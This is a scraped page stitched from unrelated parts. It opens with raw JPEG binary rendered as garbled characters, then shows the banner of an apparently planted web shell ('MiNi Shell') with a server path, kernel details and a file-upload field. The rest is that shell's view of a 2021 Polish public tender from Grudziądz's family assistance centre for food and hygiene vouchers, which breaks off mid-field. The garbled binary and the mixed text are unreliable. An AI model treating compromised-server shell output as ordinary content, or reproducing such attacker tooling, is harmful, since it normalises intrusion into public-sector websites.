JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211201/0029357401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Realizacja imiennych talonów na artykuły żywnościowe i środki czystości dla klientów Miejskiego Ośrodka Pomocy Rodzinie w Grudziądzu w okresie od dnia 1 stycznia 2022 r. do dnia 31 grudnia 2022 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Ośrodek Pomocy Rodzinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 005742433</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Waryńskiego 34A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Grudziądz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">566968700</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">566968702</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">poczta@mopr.grudziadz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mopr.grudziadz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Realizacja imiennych talonów na artykuły żywnościowe i środki czystości dla klientów Miejskiego Ośrodka Pomocy Rodzinie w Grudziądzu w okresie od dnia 1 stycznia 2022 r. do dnia 31 grudnia 2022 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-90cc9311-5275-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00293574</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00007967/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Realizacja imiennych talonów na artykuły żywnościowe pierwszej potrzeby i podstawowe środki czystości (higieniczno-sanitarne) dla klientów Miejskiego Ośrodka Pomocy Rodzinie w Grudziądzu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gpp_grudziadz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/gpp_grudziadz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający informuje, że instrukcje korzystania z platformy zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem https://platformazakupowa.pl/strona/45-instrukcje. <br/>Wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania <br/>korespondencji elektronicznej opisane zostały w regulaminie platformazakupowa.pl <br/>https://platformazakupowa.pl/strona/1-regulamin. <br/>Zamawiający określa minimalne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformie zakupowej: <br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej <br/> niż 512 kb/s, <br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB <br/> Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów <br/> operacyjnych - MS Windows 7, Mac Os x 10 4, Linux lub ich nowsze wersje, <br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet <br/> Explorer minimalnie wersja 10 0., <br/>d) włączona obsługa JavaScript, <br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format <br/> plików .pdf,<br/>f) platforma działa według standardu przyjętego w komunikacji sieciowej - <br/> kodowanie UTF8, <br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę <br/> oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera <br/> synchronizowanego z zegarem Głównego Urzędu Miar, <br/>h) maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem <br/> dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 <br/> MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.<br/>Wykonawca, przystępując do niniejszego postępowania: <br/> a) akceptuje warunki korzystania z platformazakupowa.pl określone w <br/> regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce <br/> „Regulamin&#34; oraz uznaje go za wiążący, <br/> b) zapoznał i stosuje się do instrukcji składania ofert/wniosków dostępne pod <br/> linkiem: <br/> https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view. <br/>Ofertę oraz oświadczenia składa się, pod rygorem nieważności, w formie <br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym <br/>lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) <br/> 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), zwanego dalej „RODO”, informujemy, że:<br/>1) Administratorem danych osobowych Wykonawcy jest Zamawiający: Miejski <br/> Ośrodek Pomocy Rodzinie ul. Waryńskiego 34A, 86-300 Grudziądz, tel. 56 69 <br/> 68 700, faks 56 69 68 702, e-mail: poczta@mopr.grudziadz.pl;<br/>2) inspektorem ochrony danych osobowych w Miejskim Ośrodku Pomocy <br/> Rodzinie w Grudziądzu jest Pan Sebastian Drzymalski, e-mail: <br/> iod@mopr.grudziadz.pl;<br/>3) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c <br/> RODO oraz art. 275 pkt 1 ustawy Pzp w celu związanym z postępowaniem o <br/> udzielenie zamówienia publicznego pn. „Realizacja imiennych talonów na <br/> artykuły żywnościowe pierwszej potrzeby i podstawowe środki czystości <br/> (higieniczno-sanitarne) dla klientów Miejskiego Ośrodka Pomocy Rodzinie w <br/> Grudziądzu w okresie od dnia 1 stycznia 2022 r. do dnia 31 grudnia 2022 r.” <br/> prowadzonym w trybie podstawowym; <br/> 4) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym <br/> udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 <br/> ustawy Pzp;<br/> 5) dane osobowe Wykonawcy będą przechowywane przez okres 5 lat <br/> kalendarzowych, a umowa zawarta w wyniku postępowania przez okres 10 <br/> lat, licząc od dnia pierwszego stycznia roku następnego od daty zakończenia <br/> postępowania o udzielenie zamówienia;<br/>6) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio jego <br/> dotyczących jest wymogiem ustawowym określonym w przepisach ustawy <br/> Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia <br/> publicznego, konsekwencje niepodania określonych danych wynikają z ustawy <br/> Pzp;<br/>7) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą <br/> podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) Wykonawca posiada na podstawie RODO:<br/> a) prawo dostępu do swoich danych osobowych; <br/> b) prawo do sprostowania swoich danych osobowych*;<br/> c) prawo żądania od administratora ograniczenia przetwarzania danych <br/> osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 <br/> RODO **;<br/> d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych <br/> Osobowych, gdy uzna, że przetwarzanie danych osobowych jego <br/> dotyczących narusza przepisy RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OR.251.5.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 390557,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja imiennych talonów obejmujących artykuły żywnościowe pierwszej potrzeby i podstawowe środki czystości (higieniczno-sanitarne) w okolicach Śródmieścia i Starego Miasta w Grudziądzu – przewidywana ilość talonów to około 46 talonów średniomiesięcznie dla 46 osób średniomiesięcznie w okresie od dnia 1 stycznia 2022 r. do dnia 31 grudnia 2022 r. na podstawie imiennego talonu wydawanego przez MOPR, zawierającego oznaczenie decyzji przyznającej świadczenie, dane podopiecznego (imię, nazwisko i adres), okres ważności talonu, kwotę i nazwę sklepu oraz dowodu tożsamości (dowód osobisty lub inny dokument ze zdjęciem) i decyzji MOPR. Wykonawca przystępujący do przetargu musi posiadać co najmniej jeden czynny punkt sprzedaży detalicznej artykułów żywnościowych pierwszej potrzeby i podstawowych środków czystości (higieniczno-sanitarnych) położony w Grudziądzu w rejonie miasta obejmującym daną część zamówienia. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 128549,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15400000-2 - Oleje i tłuszcze zwierzęce lub roślinne</p> <p class="mb-0">15500000-3 - Produkty mleczarskie</p> <p class="mb-0">15600000-4 - Produkty przemiału ziarna, skrobi i produktów skrobiowych</p> <p class="mb-0">15800000-6 - Różne produkty spożywcze</p> <p class="mb-0">33700000-7 - Produkty do pielęgnacji ciała</p> <p class="mb-0">39800000-0 - Środki czyszczące i polerujące</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze złożonej oferty będzie się kierować następującymi <br/> kryteriami: <br/> 1) cena brutto oferty – 60 % <br/> Maksymalną liczbę punktów, tj. 60 punktów uzyska oferta z najniższą ceną <br/> wskazaną w formularzu ofertowym. Pozostałe oferty uzyskają <br/> proporcjonalnie mniej punktów. <br/> Punkty zostaną obliczone wg następującego wzoru:<br/> Cena (C) = Cmin/ Cbad x 60 pkt <br/> <br/> gdzie:<br/> C – liczba punktów przyznanych Wykonawcy za cenę zaoferowaną w <br/> ofercie,<br/> Cmin – najniższa cena brutto spośród ofert niepodlegających odrzuceniu i <br/> złożonych przez Wykonawców, którzy nie podlegali wykluczeniu w danym <br/> etapie badania i oceny ofert,<br/> Cbad – cena brutto zaoferowana w badanej ofercie.<br/><br/>2) liczba punktów sprzedaży detalicznej artykułów żywnościowych pierwszej <br/> potrzeby i podstawowych środków czystości (higieniczno-sanitarnych) <br/> położonych w Grudziądzu – 40 % <br/> Maksymalną liczbę punktów, tj. 40 punktów uzyska oferta, w której <br/> Wykonawca zadeklaruje, że posiada największą liczbę punktów sprzedaży <br/> detalicznej artykułów żywnościowych pierwszej potrzeby i podstawowych <br/> środków czystości (higieniczno-sanitarnych) położonych w Grudziądzu w <br/> rejonie miasta obejmującym daną część zamówienia.<br/> Punkty zostaną obliczone wg następującego wzoru:<br/> <br/>Punkty sprzedaży detalicznej (S) = Sbad/Smax x 40 pkt<br/><br/> gdzie:<br/> S – liczba punktów przyznanych Wykonawcy za posiadanie punktów <br/> sprzedaży detalicznej artykułów żywnościowych pierwszej potrzeby i <br/> podstawowych środków czystości (higieniczno-sanitarnych),<br/> Sbad – liczba punktów sprzedaży detalicznej artykułów żywnościowych <br/> pierwszej potrzeby i podstawowych środków czystości (higieniczno- <br/> sanitarnych) zadeklarowana przez Wykonawcę w badanej ofercie,<br/> Smax – największa zaoferowana liczba punktów sprzedaży detalicznej <br/> artykułów żywnościowych pierwszej potrzeby i podstawowych środków <br/> czystości (higieniczno-sanitarnych) spośród ofert niepodlegających <br/> odrzuceniu i złożonych przez Wykonawców, którzy nie podlegali <br/> wykluczeniu w danym etapie badania i oceny ofert.<br/> <br/> 3) Zamawiający wyliczy łączną ocenę punktową badanej oferty na podstawie <br/> poniższego wzoru uwzględniającego kryteria:<br/><br/> P = C + S<br/><br/> gdzie:<br/> P – całkowita liczba punktów badanej oferty,<br/> C – liczba punktów przyznanych Wykonawcy w kryterium cena,<br/> S – liczba punktów przyznanych Wykonawcy w kryterium punkty sprzedaży detalicznej.<br/><br/> Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska największą <br/> liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">punkty sprzedaży detalicznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja imiennych talonów obejmujących artykuły żywnościowe pierwszej potrzeby i podstawowe środki czystości (higieniczno-sanitarne) w okolicach Tarpna w Grudziądzu – przewidywana ilość talonów to około 54 talony średniomiesięcznie dla 54 osób średniomiesięcznie w okresie od dnia 1 stycznia 2022 r. do dnia 31 grudnia 2022 r. na podstawie imiennego talonu wydawanego przez MOPR, zawierającego oznaczenie decyzji przyznającej świadczenie, dane podopiecznego (imię, nazwisko i adres), okres ważności talonu, kwotę i nazwę sklepu oraz dowodu tożsamości (dowód osobisty lub inny dokument ze zdjęciem) i decyzji MOPR. Wykonawca przystępujący do przetargu musi posiadać co najmniej jeden czynny punkt sprzedaży detalicznej artykułów żywnościowych pierwszej potrzeby i podstawowych środków czystości (higieniczno-sanitarnych) położony w Grudziądzu w rejonie miasta obejmującym daną część zamówienia. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 147216,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15400000-2 - Oleje i tłuszcze zwierzęce lub roślinne</p> <p class="mb-0">15500000-3 - Produkty mleczarskie</p> <p class="mb-0">15600000-4 - Produkty przemiału ziarna, skrobi i produktów skrobiowych</p> <p class="mb-0">15800000-6 - Różne produkty spożywcze</p> <p class="mb-0">33700000-7 - Produkty do pielęgnacji ciała</p> <p class="mb-0">39800000-0 - Środki czyszczące i polerujące</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze złożonej oferty będzie się kierować następującymi <br/> kryteriami: <br/> 1) cena brutto oferty – 60 % <br/> Maksymalną liczbę punktów, tj. 60 punktów uzyska oferta z najniższą ceną <br/> wskazaną w formularzu ofertowym. Pozostałe oferty uzyskają <br/> proporcjonalnie mniej punktów. <br/> Punkty zostaną obliczone wg następującego wzoru:<br/> Cena (C) = Cmin/ Cbad x 60 pkt <br/> <br/> gdzie:<br/> C – liczba punktów przyznanych Wykonawcy za cenę zaoferowaną w <br/> ofercie,<br/> Cmin – najniższa cena brutto spośród ofert niepodlegających odrzuceniu i <br/> złożonych przez Wykonawców, którzy nie podlegali wykluczeniu w danym <br/> etapie badania i oceny ofert,<br/> Cbad – cena brutto zaoferowana w badanej ofercie.<br/><br/>2) liczba punktów sprzedaży detalicznej artykułów żywnościowych pierwszej <br/> potrzeby i podstawowych środków czystości (higieniczno-sanitarnych) <br/> położonych w Grudziądzu – 40 % <br/> Maksymalną liczbę punktów, tj. 40 punktów uzyska oferta, w której <br/> Wykonawca zadeklaruje, że posiada największą liczbę punktów sprzedaży <br/> detalicznej artykułów żywnościowych pierwszej potrzeby i podstawowych <br/> środków czystości (higieniczno-sanitarnych) położonych w Grudziądzu w <br/> rejonie miasta obejmującym daną część zamówienia.<br/> Punkty zostaną obliczone wg następującego wzoru:<br/> <br/>Punkty sprzedaży detalicznej (S) = Sbad/Smax x 40 pkt<br/><br/> gdzie:<br/> S – liczba punktów przyznanych Wykonawcy za posiadanie punktów <br/> sprzedaży detalicznej artykułów żywnościowych pierwszej potrzeby i <br/> podstawowych środków czystości (higieniczno-sanitarnych),<br/> Sbad – liczba punktów sprzedaży detalicznej artykułów żywnościowych <br/> pierwszej potrzeby i podstawowych środków czystości (higieniczno- <br/> sanitarnych) zadeklarowana przez Wykonawcę w badanej ofercie,<br/> Smax – największa zaoferowana liczba punktów sprzedaży detalicznej <br/> artykułów żywnościowych pierwszej potrzeby i podstawowych środków <br/> czystości (higieniczno-sanitarnych) spośród ofert niepodlegających <br/> odrzuceniu i złożonych przez Wykonawców, którzy nie podlegali <br/> wykluczeniu w danym etapie badania i oceny ofert.<br/> <br/> 3) Zamawiający wyliczy łączną ocenę punktową badanej oferty na podstawie <br/> poniższego wzoru uwzględniającego kryteria:<br/><br/> P = C + S<br/><br/> gdzie:<br/> P – całkowita liczba punktów badanej oferty,<br/> C – liczba punktów przyznanych Wykonawcy w kryterium cena,<br/> S – liczba punktów przyznanych Wykonawcy w kryterium punkty sprzedaży detalicznej.<br/><br/> Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska największą <br/> liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">punkty sprzedaży detalicznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: 